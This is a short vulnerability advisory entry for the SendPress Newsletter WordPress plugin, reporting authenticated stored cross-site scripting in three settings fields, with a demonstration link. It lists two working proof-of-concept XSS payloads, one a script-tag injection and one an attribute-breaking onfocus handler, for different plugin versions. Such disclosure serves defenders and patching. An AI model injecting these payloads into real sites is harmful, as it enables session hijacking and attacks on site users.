SendPress Newsletter < 1.20.7.13 - Authenticated Stored Cross-Site Scripting (XSS)

2020-07-13T00:00:00
ID WPEX-ID:B2B14627-E91F-4346-B1BC-3BFBDB77C552
Type wpexploit
Reporter Chevon Phillip
Modified 2020-07-14T05:05:23

Description

Multiple Stored Cross-Site Scripting within SendPress Newsletter Settings due to improper input sanitation. The vulnerable fields are: - From Name - From Email - Where to send Test Email

                                        
                                            https://www.dropbox.com/s/slnc6oj1ryssvuz/sendpress-xss.mp4?dl=0

Payloads
- v < 1.20.7.10: test"><script>alert(1337)</script>/**//
- v < 1.20.7.13: " autofocus=autofocus onfocus=alert(/XSS/) a=